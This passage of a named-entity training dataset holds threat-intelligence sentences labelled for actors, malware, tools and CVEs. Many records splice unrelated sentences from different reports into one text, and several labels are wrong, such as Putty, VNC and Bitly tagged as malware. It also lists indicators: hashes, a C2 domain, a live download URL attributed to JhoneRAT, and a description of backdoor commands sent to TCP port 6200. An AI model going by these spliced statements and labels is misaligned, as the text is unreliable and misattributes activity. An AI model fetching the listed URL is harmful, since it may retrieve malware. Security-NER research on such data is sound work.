In addition to its custom malware , Elfin has also used a number of commodity malware tools , available for purchase on the cyber underground . In the sample analyzed , PIEHOP ’s entry point c018c54eff8fd0b9be50b5d419d80f21 ( r3_iec104_control.py ) calls PIEHOP ’s main function , supplying the argument .", "spans": {"ORGANIZATION: Novetta": [[152, 159]], "ORGANIZATION: International Civil Aviation Organization": [[291, 332]], "THREAT_ACTOR: Elfin": [[455, 460]]}, "info": {"id": "cyberner_stix_train_004670", "source": "cyberner_stix_train"}} {"text": "This threat group uses a first-stage malware known as Backdoor.APT.Pgift ( aka Troj/ReRol.A ) , which is dropped via malicious documents and connects back to a C2 server . The attachments exploited CVE-2017-8759 which was discovered and documented only five days prior to the campaign .", "spans": {"THREAT_ACTOR: threat group": [[5, 17]], "MALWARE: Backdoor.APT.Pgift": [[54, 72]], "VULNERABILITY: CVE-2017-8759": [[198, 211]]}, "info": {"id": "cyberner_stix_train_004671", "source": "cyberner_stix_train"}} {"text": "Also in 2014 , APT32 carried out an intrusion against a Western country’s national legislature . 
Group-IB specialists determined that the email addresses of IT bank employees were among the recipients of these emails .", "spans": {"THREAT_ACTOR: APT32": [[15, 20]], "ORGANIZATION: Group-IB": [[97, 105]], "TOOL: email": [[138, 143]], "ORGANIZATION: bank": [[160, 164]], "ORGANIZATION: employees": [[165, 174]], "TOOL: emails": [[210, 216]]}, "info": {"id": "cyberner_stix_train_004672", "source": "cyberner_stix_train"}} {"text": "Let ’ s compare examples of traffic from Smaps and Asacub — an initializing request to the C & C server with information about the infected device and a response from the server with a command for execution : Smaps request Asacub request Decrypted data from Asacub traffic : { “ id ” : ” 532bf15a-b784-47e5-92fa-72198a2929f5″ , ” type ” : ” get ” , ” info ” : ” imei:365548770159066 , country : PL , cell : Tele2 TG-3390 can quickly leverage compromised network infrastructure during an operation and can conduct simultaneous intrusions into multiple environments . While previous routines took advantage of competing miners ’ activities and unrelated components to hijack the profit , the latest version of the code attempts to remove all related files and codes from previous infections ( including their own to make sure the running components are updated , as well as those from other cybercriminals to maximize the resources of the zombie host ) and creates a new working directory /tmp/.X19-unix to move the kit and extract the files . 
After Kaspersky ’s reports of these attacks , the rest of 2013 saw reduced intensity of the campaign .", "spans": {"MALWARE: Smaps": [[41, 46], [209, 214]], "MALWARE: Asacub": [[51, 57], [223, 229], [258, 264]], "THREAT_ACTOR: TG-3390": [[413, 420]], "ORGANIZATION: Kaspersky ’s": [[1048, 1060]]}, "info": {"id": "cyberner_stix_train_004673", "source": "cyberner_stix_train"}} {"text": "Using other individuals names for C2 communication has also been done by the two other Gaza Cybergang groups :", "spans": {"TOOL: C2": [[34, 36]]}, "info": {"id": "cyberner_stix_train_004674", "source": "cyberner_stix_train"}} {"text": "In some attacks , Whitefly has used a second piece of custom malware , Trojan.Nibatad . A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group .", "spans": {"TOOL: Trojan.Nibatad": [[71, 85]], "VULNERABILITY: zero-day": [[193, 201]], "VULNERABILITY: exploit": [[202, 209]], "THREAT_ACTOR: Gamma Group": [[335, 346]]}, "info": {"id": "cyberner_stix_train_004675", "source": "cyberner_stix_train"}} {"text": "Both toolsets were originally spotted being deployed by CozyDuke to its victims .", "spans": {"MALWARE: CozyDuke": [[56, 64]]}, "info": {"id": "cyberner_stix_train_004677", "source": "cyberner_stix_train"}} {"text": "Targeting Postal and Transportation Services Companies One of the most significant findings is that new versions of FakeSpy target not only Korean and Japanese speakers , but also almost any postal service company around the world . 
Western and Saudi organizations in industries that have been historically targeted by APT33 should be monitoring geopolitical developments and increasing the scrutiny of operational security controls focusing on detection and remediation of initial unauthorized access , specifically from phishing campaigns , webshells . Once inside the network , the GCMAN group uses legitimate and penetration testing tools such as Putty , VNC , and Meterpreter for lateral movement .", "spans": {"MALWARE: FakeSpy": [[116, 123]], "THREAT_ACTOR: APT33": [[319, 324]], "THREAT_ACTOR: GCMAN group": [[585, 596]], "MALWARE: Putty": [[651, 656]], "MALWARE: VNC": [[659, 662]], "MALWARE: Meterpreter": [[669, 680]]}, "info": {"id": "cyberner_stix_train_004678", "source": "cyberner_stix_train"}} {"text": "In the 2015-early 2016 versions examined in this article , C & C instructions in JSON format contained the name of the command in text form ( “ get_sms ” , “ block_phone ” ) . The adversaries have used this technique to allow PlugX and HTTPBrowser to persist on a system . We also found traces of Android Package Kits- ( APK- ) and Android Debug Bridge ( ADB )-based commands that enable cryptocurrency mining activities in Android-based TVs . 
The US Justice Department thinks he 's been deploying LockBit ransomware on victim networks both in the States and overseas , with the investigation having run from August 2020 through March 2023 .", "spans": {"TOOL: PlugX": [[226, 231]], "TOOL: HTTPBrowser": [[236, 247]], "TOOL: Android Package Kits-": [[297, 318]], "TOOL: APK-": [[321, 325]], "TOOL: Android Debug Bridge": [[332, 352]], "TOOL: ADB": [[355, 358]], "TOOL: Android-based TVs": [[424, 441]], "ORGANIZATION: US Justice Department": [[448, 469]], "MALWARE: LockBit ransomware": [[498, 516]]}, "info": {"id": "cyberner_stix_train_004680", "source": "cyberner_stix_train"}} {"text": "As explained in their whitepaper , the researchers observed the surprisingly small MiniDuke backdoor being spread via the same exploit that was being used by a malware that they had already named ItaDuke ; the “ Duke ” part of this malware ’s name had in turn come about because it reminded the researchers of the notable Duqu threat .", "spans": {"MALWARE: MiniDuke backdoor": [[83, 100]], "MALWARE: ItaDuke": [[196, 203]], "THREAT_ACTOR: Duke": [[212, 216]], "MALWARE: Duqu": [[322, 326]]}, "info": {"id": "cyberner_stix_train_004681", "source": "cyberner_stix_train"}} {"text": "EventBot requests permissions to always run in the background . A significantly improved variant of the Bemstour exploit tool was rolled out in September 2016 , when it was used in an attack against an educational institution in Hong Kong . 
We were ultimately able to identify multiple organizations in the government , energy , and technology sectors targeted by Magic Hound .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: Bemstour": [[104, 112]], "ORGANIZATION: government": [[307, 317]], "ORGANIZATION: energy": [[320, 326]], "ORGANIZATION: technology sectors": [[333, 351]]}, "info": {"id": "cyberner_stix_train_004682", "source": "cyberner_stix_train"}} {"text": "] us domain : the phone number registered with this domain is the same as the phone number appearing on the Facebook page . From our trend analysis seen in Figure 3 , Locky ransomware started being delivered via DOCM format email attachments more extensively beginning in August . Lazarus used watering hole attacks to compromise legitimate and trusted websites frequently visited by their targets .", "spans": {"ORGANIZATION: Facebook": [[108, 116]], "MALWARE: Locky": [[167, 172]], "THREAT_ACTOR: Lazarus": [[281, 288]]}, "info": {"id": "cyberner_stix_train_004683", "source": "cyberner_stix_train"}} {"text": "This activity resembles previous campaigns such as Gooligan , HummingBad and CopyCat . Although the developers of Bookworm have included only keylogging functionality in Bookworm as a core ability , as suggested in Table 1 , several of the embedded DLLs provide Leader with cryptographic and hashing functions , while others support Leader 's ability to communicate with its C2 server . This includes prominent figures in the United Nations , opposition bloggers and activists , and regional news correspondents , ” a blogpost about Kaspersky ’s findings reads . 
PingPull can use HTTPS over port 8080 for C2.[28 ]", "spans": {"MALWARE: Gooligan": [[51, 59]], "MALWARE: HummingBad": [[62, 72]], "MALWARE: CopyCat": [[77, 84]], "TOOL: Bookworm": [[114, 122], [170, 178]], "TOOL: Leader": [[333, 339]], "ORGANIZATION: Kaspersky": [[533, 542]], "MALWARE: PingPull": [[563, 571]], "SYSTEM: HTTPS": [[580, 585]], "SYSTEM: C2.[28": [[605, 611]]}, "info": {"id": "cyberner_stix_train_004684", "source": "cyberner_stix_train"}} {"text": "On December 29 , 2016 , the Department of Homeland Security ( DHS ) and Federal Bureau of Investigation ( FBI ) released a Joint Analysis Report confirming FireEye ’s long held public assessment that the Russian Government sponsors APT28 .", "spans": {"ORGANIZATION: Department of Homeland Security": [[28, 59]], "ORGANIZATION: DHS": [[62, 65]], "ORGANIZATION: Federal Bureau of Investigation": [[72, 103]], "ORGANIZATION: FBI": [[106, 109]], "ORGANIZATION: FireEye": [[156, 163]], "THREAT_ACTOR: APT28": [[232, 237]]}, "info": {"id": "cyberner_stix_train_004685", "source": "cyberner_stix_train"}} {"text": "Then the app finds a process id value for the process it wants to inject with code . These have been highly active in the Middle East region and unveiled ongoing targeted attacks in multiple regions . Now , threat actors are using well-known websites—that they do not need to compromise to host C2 IP addresses . When loaded at system boot , the downloader uses a set of mathematical calculations to determine the computer - s unique fingerprint , and in turn uses this data to uniquely encrypt its communications later .", "spans": {"TOOL: C2": [[295, 297]]}, "info": {"id": "cyberner_stix_train_004686", "source": "cyberner_stix_train"}} {"text": "Two binder tools — used to disguise custom executables as legitimate Microsoft implants — were discovered by Falcon Intelligence and linked to MYTHIC LEOPARD in July 2017 . 
PLEAD also dabbled with a short-lived , fileless version of their malware when it obtained an exploit for a Flash vulnerability ( CVE-2015-5119 ) that was leaked during the Hacking Team breach .", "spans": {"ORGANIZATION: Microsoft": [[69, 78]], "ORGANIZATION: Falcon Intelligence": [[109, 128]], "THREAT_ACTOR: MYTHIC LEOPARD": [[143, 157]], "VULNERABILITY: exploit": [[267, 274]], "TOOL: Flash": [[281, 286]], "VULNERABILITY: CVE-2015-5119": [[303, 316]]}, "info": {"id": "cyberner_stix_train_004687", "source": "cyberner_stix_train"}} {"text": "This malware is responsible for decrypting the Adobe.icx file in the same folder .", "spans": {"FILEPATH: Adobe.icx": [[47, 56]]}, "info": {"id": "cyberner_stix_train_004688", "source": "cyberner_stix_train"}} {"text": "Lieutenant Captain Nikolay Kozacheck ( who used the hacker monikers \" kazak \" and \" blablabla1234465 \" ) was the primary developer and maintainer of X-Agent , according to the indictment , and he was assisted by another officer , Pavel Yershov , in preparing it for deployment .", "spans": {"MALWARE: X-Agent": [[149, 156]]}, "info": {"id": "cyberner_stix_train_004689", "source": "cyberner_stix_train"}} {"text": "Beginning in August 2016 , a group calling itself the Shadow Brokers began releasing tools it claimed to have originated from the Equation Group . 
Once inside a network , APT40 uses credential-harvesting tools to gain usernames and passwords , allowing it to expand its reach across the network and move laterally through an environment as it moves to towards the ultimate goal of stealing data .", "spans": {"THREAT_ACTOR: Shadow Brokers": [[54, 68]], "THREAT_ACTOR: Equation": [[130, 138]], "THREAT_ACTOR: APT40": [[171, 176]], "MALWARE: credential-harvesting tools": [[182, 209]]}, "info": {"id": "cyberner_stix_train_004690", "source": "cyberner_stix_train"}} {"text": "We ’ve seen quite a few versions of these implants and they were relatively widespread for a time .", "spans": {}, "info": {"id": "cyberner_stix_train_004691", "source": "cyberner_stix_train"}} {"text": "] net : Nam Phrik Num Somtum [ . A timeline of new activity can be scoped out for the group , with the greatest number of related downloaders created by the developers in December 2011 , Feb and March of 2012 , followed by June of 2012 . Instead , the attackers manually cut and pasted older versions after altering some parts . These restrictions are specified by a list of allowed URIs .", "spans": {"SYSTEM: allowed URIs": [[375, 387]]}, "info": {"id": "cyberner_stix_train_004692", "source": "cyberner_stix_train"}} {"text": "The same user posted multiple similar posts most of them containing similar base64 encoded content ( probably used by the malwares in other campaigns to decode and drop malware executable ) , these posts were made between July 21st , 2016 to September 30 , 2016 .", "spans": {"TOOL: base64 encoded content": [[76, 98]]}, "info": {"id": "cyberner_stix_train_004693", "source": "cyberner_stix_train"}} {"text": "The initial indicator of the attack was a malicious web shell that was detected on an IIS server , coming out of the w3wp.exe process . 
Barium specializes in targeting high value organizations holding sensitive data , by gathering extensive information about their employees through publicly available information and social media , using that information to fashion phishing attacks intended to trickthose employees into compromising their computers and networks .", "spans": {"MALWARE: w3wp.exe": [[117, 125]], "THREAT_ACTOR: Barium": [[136, 142]], "ORGANIZATION: employees": [[265, 274], [407, 416]], "ORGANIZATION: social media": [[318, 330]]}, "info": {"id": "cyberner_stix_train_004694", "source": "cyberner_stix_train"}} {"text": "Google Play has removed the apps and they stated that \" thanks to enhanced detection models , Google Play Protect will now be able to better detect future variants of these applications '' . The June 2017 sample of Clayslide contained the same OfficeServicesStatus.vbs file found in the ISMAgent Clayslide document , but instead of having the payload embedded in the macro as segregated base64 strings that would be concatenated , this variant obtained its payload from multiple cells within the \" Incompatible \" worksheet . The attacker put a couple of tricks in place to avoid execution on virtual machines ( sandbox ) . Budworm has targeted victims in many countries in Southeast Asia and the Middle East , among other locations , including the U.S. Symantecs Threat Hunter Team published a blog in October 2022 detailing how Budworm activity was seen on the network of a U.S. state legislature .", "spans": {"SYSTEM: Google Play": [[0, 11]], "SYSTEM: Google Play Protect": [[94, 113]], "TOOL: Clayslide": [[215, 224]], "MALWARE: OfficeServicesStatus.vbs file": [[244, 273]], "TOOL: ISMAgent Clayslide document": [[287, 314]], "TOOL: sandbox": [[611, 618]], "THREAT_ACTOR: Budworm": [[623, 630]], "ORGANIZATION: victims": [[644, 651]], "ORGANIZATION: Symantecs Threat Hunter Team": [[753, 781]], "ORGANIZATION: U.S. 
state legislature": [[875, 897]]}, "info": {"id": "cyberner_stix_train_004695", "source": "cyberner_stix_train"}} {"text": "The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . During the same time period , we also observed the actor using the Browser Exploitation Framework ( BeEF ) to compromise victim hosts and download Cobalt Strike .", "spans": {"MALWARE: documents": [[4, 13]], "VULNERABILITY: CVE-2012-0158": [[97, 110]], "VULNERABILITY: Microsoft Word vulnerabilities": [[166, 196]], "MALWARE: Cobalt Strike": [[388, 401]]}, "info": {"id": "cyberner_stix_train_004696", "source": "cyberner_stix_train"}} {"text": "( Researchers have been aware of this suite as early as 2014 . Several xxmm samples analyzed by CTU researchers incorporate Mimikatz , allowing BRONZE BUTLER to issue Mimikatz commands directly from xxmm . Rolles previously explained the unflattening algorithm in a Hex-Rays blog . Then , users were prompted to download a malicious trojan .", "spans": {"ORGANIZATION: CTU": [[96, 99]], "TOOL: Mimikatz": [[124, 132], [167, 175]], "THREAT_ACTOR: BRONZE BUTLER": [[144, 157]], "TOOL: Hex-Rays": [[266, 274]], "MALWARE: a malicious trojan": [[321, 339]]}, "info": {"id": "cyberner_stix_train_004697", "source": "cyberner_stix_train"}} {"text": "Triada : organized crime on Android Second , it substitutes the system functions and conceals its modules from the list of the running processes and installed apps . The other one , ScarCruft 's Operation Erebus employs an older exploit , for CVE-2016-4117 and leverages watering holes . 
The email address edmundj@chmail.ir and the geolocation of Tehran , Iran , being of note .", "spans": {"MALWARE: Triada": [[0, 6]], "SYSTEM: Android": [[28, 35]], "VULNERABILITY: CVE-2016-4117": [[243, 256]], "TOOL: email": [[292, 297]]}, "info": {"id": "cyberner_stix_train_004698", "source": "cyberner_stix_train"}} {"text": "Many top providers in Russia offer cheap prices for their shared hosting services , and some even provide free 30-day trial periods . On November 15 , 2016 , an actor related to the OilRig campaign began testing the Clayslide delivery documents . In this case , the SFX archive contains 8 files : five of them are legit DLLs used by the “ 6323 ” executable to interoperate with the OLE format defined and used by Microsoft Office . The group 's 91 attacks come not long after their extensive GoAnywhere campaign in March , when they hit over 100 organizations using a nasty zero - day .", "spans": {"THREAT_ACTOR: actor": [[161, 166]], "TOOL: Clayslide delivery documents": [[216, 244]], "FILEPATH: SFX archive": [[266, 277]], "TOOL: DLLs": [[318, 322]], "FILEPATH: 6323": [[337, 341]], "TOOL: OLE": [[380, 383]], "TOOL: Microsoft Office": [[410, 425]], "THREAT_ACTOR: The group": [[428, 437]]}, "info": {"id": "cyberner_stix_train_004699", "source": "cyberner_stix_train"}} {"text": "] it Cosenza server1ct.exodus.connexxa [ . In this blog post we provide additional information linking TEMP.Veles and their activity surrounding the TRITON intrusion to a Russian government-owned research institute . 
This file is created in the same folder as the binary of the backdoor To learn more about how ThreatConnect can help you prepare for the potential of a ransomware attack , check out the ThreatConnect Platform .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[103, 113]], "TOOL: TRITON": [[149, 155]], "MALWARE: backdoor": [[278, 286]], "TOOL: ThreatConnect": [[311, 324]], "TOOL: ThreatConnect Platform": [[403, 425]]}, "info": {"id": "cyberner_stix_train_004700", "source": "cyberner_stix_train"}} {"text": "The decoy documents used by the InPage exploits suggest that the targets are likely to be politically or militarily motivated . We assess with high confidence that the attackers discussed here are associated with the Chinese state intelligence apparatus .", "spans": {"TOOL: decoy documents": [[4, 19]], "VULNERABILITY: InPage exploits": [[32, 47]], "ORGANIZATION: politically": [[90, 101]], "ORGANIZATION: militarily": [[105, 115]]}, "info": {"id": "cyberner_stix_train_004701", "source": "cyberner_stix_train"}} {"text": "] 26/html2/new-inj-135-3-white.html hxxp : //facebook-photos-au [ . It came in the form of a \" Tran Duy Linh \" CVE-2012-0158 exploit kit document MD5 : de8a242af3794a8be921df0cfa51885f61 and was observed on April 10 , 2014 . Rancor : 0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707 . 
SecretsDump A publicly available tool that can perform various techniques to dump secrets from the remote machine without executing any agent .", "spans": {"TOOL: Tran Duy Linh": [[95, 108]], "VULNERABILITY: CVE-2012-0158": [[111, 124]], "THREAT_ACTOR: Rancor": [[225, 231]], "FILEPATH: 0EB1D6541688B5C87F620E76219EC5DB8A6F05732E028A9EC36195D7B4F5E707": [[234, 298]], "TOOL: SecretsDump": [[301, 312]]}, "info": {"id": "cyberner_stix_train_004702", "source": "cyberner_stix_train"}} {"text": "Interestingly , one unused feature of the app is its ability to manipulate data in the Android package manager to add and remove permissions and components as well as hide the app icon . At certain times , Mesri has been a member of an Iran-based hacking group called the Turk Black Hat security team \" . caused additional problems . While COSMICENERGY ’s capabilities are not significantly different from previous OT malware families ’ , its discovery highlights several notable developments in the OT threat landscape .", "spans": {"SYSTEM: Android": [[87, 94]], "THREAT_ACTOR: hacking group": [[247, 260]], "THREAT_ACTOR: Turk Black Hat": [[272, 286]], "MALWARE: COSMICENERGY ’s": [[340, 355]], "MALWARE: OT malware families": [[415, 434]]}, "info": {"id": "cyberner_stix_train_004703", "source": "cyberner_stix_train"}} {"text": "We collectively refer to this package and related activity as “ Zebrocy ” and had written a few reports on its usage and development by June 2017 – Sofacy developers modified and redeployed incremented versions of the malware .", "spans": {"MALWARE: Zebrocy": [[64, 71]], "THREAT_ACTOR: Sofacy": [[148, 154]]}, "info": {"id": "cyberner_stix_train_004704", "source": "cyberner_stix_train"}} {"text": "HTTP Communication In addition to the MQTT communication , the app also uses plain text HTTP communication in order to download the .dex file and upload collected data . From mid-2016 through early 2017 , APT33 compromised organizations located in Saudi Arabia and U.S. 
in the aerospace sector . The malware utilizes several persistence mechanisms including scheduled tasks, Userinit and Run registry keys in the HKLM . Composition of the KillNet Collective", "spans": {"THREAT_ACTOR: APT33": [[205, 210]], "ORGANIZATION: aerospace sector": [[277, 293]], "TOOL: HKLM": [[413, 417]], "THREAT_ACTOR: KillNet Collective": [[439, 457]]}, "info": {"id": "cyberner_stix_train_004705", "source": "cyberner_stix_train"}} {"text": "Rapid7 again observed APT10 dropping payloads named ccSEUPDT.exe . For example , in September 2016 , Sowbug infiltrated an organization in Asia , deploying the Felismus backdoor on one of its computers , Computer A , using the file name adobecms.exe in CSIDL_WINDOWS\\debug .", "spans": {"ORGANIZATION: Rapid7": [[0, 6]], "THREAT_ACTOR: APT10": [[22, 27]], "MALWARE: ccSEUPDT.exe": [[52, 64]], "THREAT_ACTOR: Sowbug": [[101, 107]], "MALWARE: Felismus backdoor": [[160, 177]], "FILEPATH: adobecms.exe": [[237, 249]], "FILEPATH: CSIDL_WINDOWS\\debug": [[253, 272]]}, "info": {"id": "cyberner_stix_train_004706", "source": "cyberner_stix_train"}} {"text": "To help disrupt this tactic , it is important that organizations implement two-factor authentication for all remote access solutions and consider doing the same for internal , high-value assets like their internal system management consoles .", "spans": {}, "info": {"id": "cyberner_stix_train_004707", "source": "cyberner_stix_train"}} {"text": "The CosmicDuke toolset is designed around a main information stealer component .", "spans": {"MALWARE: CosmicDuke": [[4, 14]], "TOOL: information stealer": [[49, 68]]}, "info": {"id": "cyberner_stix_train_004708", "source": "cyberner_stix_train"}} {"text": "In March 2017 , in response to active targeting of FireEye clients , the team launched a Community Protection Event (CPE) – a coordinated effort between Mandiant incident responders , FireEye as a Service (FaaS) , FireEye iSight Intelligence , and FireEye product engineering – to 
protect all clients from APT32 activity . Through our continuous monitoring of threats during 2018 , we observed a new wave of attacks by Gaza Cybergang Group1 targeting embassies and political personnel .", "spans": {"ORGANIZATION: FireEye": [[51, 58], [184, 191], [248, 255]], "ORGANIZATION: Mandiant": [[153, 161]], "ORGANIZATION: FireEye iSight Intelligence": [[214, 241]], "THREAT_ACTOR: APT32": [[306, 311]], "THREAT_ACTOR: Gaza Cybergang Group1": [[419, 440]], "ORGANIZATION: embassies": [[451, 460]], "ORGANIZATION: political personnel": [[465, 484]]}, "info": {"id": "cyberner_stix_train_004709", "source": "cyberner_stix_train"}} {"text": "EventBot Listening to TYPE_VIEW_TEXT_CHANGED accessibility event Listening to TYPE_VIEW_TEXT_CHANGED accessibility event . We identified two methods to deliver the KerrDown downloader to targets . Further analysis revealed a well-established collection of fake social media profiles that appear intended to build trust and rapport with potential victims .", "spans": {"MALWARE: EventBot": [[0, 8]], "ORGANIZATION: We": [[123, 125]], "MALWARE: KerrDown": [[164, 172]], "ORGANIZATION: social media": [[261, 273]]}, "info": {"id": "cyberner_stix_train_004710", "source": "cyberner_stix_train"}} {"text": "At that time i got the source code from github , so i tried the code to find that the core of the c2 which is powershell payload is messing ( the leaker didn’t include the payload in order to by all the tools ) . so i didn’t have time to reverse engineer the source code and i left it . 
last week i got 3 days off from my work ( working in SOC will keep you for ever busy ) so i started analyzing the code which will be discussed below and i was able to understand how it works in order to create the messing powershell payload and make the c2 come to life .", "spans": {"TOOL: github": [[40, 46]], "TOOL: c2": [[98, 100], [541, 543]], "TOOL: powershell": [[110, 120], [509, 519]], "TOOL: SOC": [[340, 343]]}, "info": {"id": "cyberner_stix_train_004711", "source": "cyberner_stix_train"}} {"text": "A backdoor that communicates with a single command and control (C2) server using HTTP GET and POST requests , TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution . One of the first botnets specializing in targeting the trading software called Quik was \" Ranbyus \" , created in 2012 .", "spans": {"MALWARE: TONEDEAF": [[110, 118]], "MALWARE: Quik": [[316, 320]], "MALWARE: Ranbyus": [[327, 334]]}, "info": {"id": "cyberner_stix_train_004712", "source": "cyberner_stix_train"}} {"text": "The Command & Control ( CC ) of the analysed sample is myinvestgroup[.]com .", "spans": {"TOOL: Command & Control": [[4, 21]], "TOOL: CC": [[24, 26]], "DOMAIN: myinvestgroup[.]com": [[55, 74]]}, "info": {"id": "cyberner_stix_train_004713", "source": "cyberner_stix_train"}} {"text": "GET_TASKS - Allows the application to get information about current or recently run tasks . The same group is believed to have also been using the Cobalt Strike framework to run sophisticated campaigns , plotting and performing financial heists of financial institutions . 
Similar to that of their targeted attacks , Gorgon Group leveraged Bitly for distribution and shortening of C2 domains .", "spans": {"THREAT_ACTOR: group": [[101, 106]], "TOOL: framework": [[161, 170]], "ORGANIZATION: financial": [[228, 237]], "THREAT_ACTOR: Gorgon Group": [[317, 329]], "MALWARE: Bitly": [[340, 345]], "TOOL: C2": [[381, 383]]}, "info": {"id": "cyberner_stix_train_004714", "source": "cyberner_stix_train"}} {"text": "The overall purpose of Cannon is to use several email accounts to send system data ( system information and screenshot ) to the threat actors and to ultimately obtain a payload from an email from the actors .", "spans": {"MALWARE: Cannon": [[23, 29]], "TOOL: email": [[48, 53], [185, 190]]}, "info": {"id": "cyberner_stix_train_004715", "source": "cyberner_stix_train"}} {"text": "Afterwards , the installer malware creates a downloader and a configuration file from its resource and executes it . A Clever Kitten attack starts with the use of a web vulnerability scanner to conduct reconnaissance .", "spans": {"THREAT_ACTOR: Clever Kitten": [[119, 132]], "MALWARE: web vulnerability scanner": [[165, 190]]}, "info": {"id": "cyberner_stix_train_004716", "source": "cyberner_stix_train"}} {"text": "While some of the legitimate apps HenBox use as decoys can be found on Google Play , HenBox apps themselves have only been found on third-party ( non-Google Play ) app stores . Our telemetry indicates that the actors maintained access in the ICS-Forth network through at least April 24 , five days after the statement was publicly released . 
The admin@338 , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors .", "spans": {"MALWARE: HenBox": [[34, 40], [85, 91]], "SYSTEM: Google Play": [[71, 82]], "SYSTEM: Play": [[157, 161]], "THREAT_ACTOR: actors": [[210, 216]], "THREAT_ACTOR: admin@338": [[346, 355]], "ORGANIZATION: financial services": [[423, 441]], "ORGANIZATION: telecoms": [[444, 452]], "ORGANIZATION: government": [[455, 465]], "ORGANIZATION: defense sectors": [[472, 487]]}, "info": {"id": "cyberner_stix_train_004717", "source": "cyberner_stix_train"}} {"text": "Sending the command sh to TCP port 6200 results in a full terminal being dropped : Sending the command cmd followed by a proper terminal command will execute it and print the output ( in the example we use id which displays the identity of the system user running the issued commands ) : Doing the same as above but with command sucmd will run the terminal command as root : Other commands supported by rootdaemon on TCP port 6200 are su ( which in our tests did n't properly work ) , loadsocketpolicy , loadfilepolicy , remount and removeroot There is no evidence that Suckfly gained any benefits from attacking the government organizations , but someone else may have benefited from these attacks . Resume of a woman from Abu-Dis , Palestinian Authority 4a6d1b686873158a1eb088a2756daf2882bef4f5ffc7af370859b6f87c08840f . 
The targeting of a telecommunications company and government also point to the motivation behind the campaign being intelligence gathering , which is the motivation that generally drives Budworm activity .", "spans": {"ORGANIZATION: government organizations": [[617, 641]], "ORGANIZATION: Palestinian Authority": [[734, 755]], "FILEPATH: 4a6d1b686873158a1eb088a2756daf2882bef4f5ffc7af370859b6f87c08840f": [[756, 820]], "ORGANIZATION: telecommunications company": [[842, 868]], "ORGANIZATION: government": [[873, 883]], "THREAT_ACTOR: Budworm": [[1010, 1017]]}, "info": {"id": "cyberner_stix_train_004718", "source": "cyberner_stix_train"}} {"text": "They seem to have specialized knowledge about military operations , as they are focused on stealing specific files such as those that describe navigation routes . At first look , it pretends to be a Java related application but after a quick analysis , it was obvious this was something more than just a simple Java file .", "spans": {"THREAT_ACTOR: They": [[0, 4]], "ORGANIZATION: military": [[46, 54]], "MALWARE: Java related application": [[199, 223]], "FILEPATH: Java file": [[311, 320]]}, "info": {"id": "cyberner_stix_train_004719", "source": "cyberner_stix_train"}} {"text": "By manipulating a SQLite database , Exodus is able to keep itself running even when the screen goes off and the application would otherwise be suspended to reduce battery consumption . Sowbug 's next move was to list any remote shared drives and then attempt to access remote shares owned by the specific government office they were targeting , again attempting to extract all Word documents . JhoneRAT : https://drive.google.com/uc?export=downloadid=1LVdv4bjcQegPdKrc5WLb4W7ad6Zt80zl . 
The campaigns we discovered also involve malicious files intended for users in Poland .", "spans": {"MALWARE: Exodus": [[36, 42]], "THREAT_ACTOR: Sowbug": [[185, 191]], "ORGANIZATION: government office": [[305, 322]], "MALWARE: Word documents": [[377, 391]], "MALWARE: JhoneRAT": [[394, 402]], "DOMAIN: https://drive.google.com/uc?export=downloadid=1LVdv4bjcQegPdKrc5WLb4W7ad6Zt80zl": [[405, 484]], "ORGANIZATION: users in Poland": [[557, 572]]}, "info": {"id": "cyberner_stix_train_004720", "source": "cyberner_stix_train"}} {"text": "Google Play Protect is constantly updating detection engines and warning users of malicious apps installed on their device . The malware tools used by BLACKGEAR can be categorized into three categories : binders , downloaders and backdoors . Knowing the obfuscation routines for this data we wrote a script to extract the URLs / IPs and ports stored . • Unauthorized network connections to MSSQL servers ( TCP/1433 ) and irregular or unauthorized authentication .", "spans": {"SYSTEM: Google Play Protect": [[0, 19]], "TOOL: binders": [[204, 211]], "TOOL: downloaders": [[214, 225]], "TOOL: backdoors": [[230, 239]]}, "info": {"id": "cyberner_stix_train_004721", "source": "cyberner_stix_train"}} {"text": "This happens all the time in regular Android apps , as Activity is one of the fundamental Android UI elements . The next sample was another Spindest variant and had the same timestamp as the aforementioned PcClient sample . The suspected APT16 targeting of the Taiwanese government agency – in addition to the Taiwanese media organizations – further supports this possibility . 
They have named it Industroyer – the biggest threat to Industrial Control Systems ( ICS ) since Stuxnet .", "spans": {"SYSTEM: Android": [[37, 44], [90, 97]], "TOOL: Spindest": [[140, 148]], "TOOL: PcClient sample": [[206, 221]], "THREAT_ACTOR: APT16": [[238, 243]], "ORGANIZATION: Taiwanese government": [[261, 281]], "MALWARE: Industroyer": [[397, 408]], "SYSTEM: Industrial Control Systems ( ICS": [[433, 465]]}, "info": {"id": "cyberner_stix_train_004722", "source": "cyberner_stix_train"}} {"text": "Never forget to update your system . The second Windows vulnerability (CVE-2017-0143) was patched in March 2017 after it was discovered to have been used by two exploit tools—EternalRomance and EternalSynergy—that were also released as part of the Shadow Brokers leak . In May 2016 , we published a blog detailing a spear phishing campaign targeting banks in the Middle East region that used macro-enabled attachments to distribute POWBAT malware .", "spans": {"VULNERABILITY: vulnerability": [[56, 69]], "THREAT_ACTOR: Shadow Brokers": [[248, 262]], "ORGANIZATION: banks": [[350, 355]], "MALWARE: POWBAT": [[432, 438]], "MALWARE: malware": [[439, 446]]}, "info": {"id": "cyberner_stix_train_004723", "source": "cyberner_stix_train"}} {"text": "In addition , we discovered evidence of a completely different payload in Koadic being delivered as well .", "spans": {"TOOL: Koadic": [[74, 80]]}, "info": {"id": "cyberner_stix_train_004724", "source": "cyberner_stix_train"}} {"text": "Their operational security is good .", "spans": {}, "info": {"id": "cyberner_stix_train_004725", "source": "cyberner_stix_train"}} {"text": "The numbering seems to have started anew after the version 9 . Analysis of TG-3390 's operations , targeting , and tools led CTU researchers to assess with moderate confidence the group is located in the People's Republic of China . 
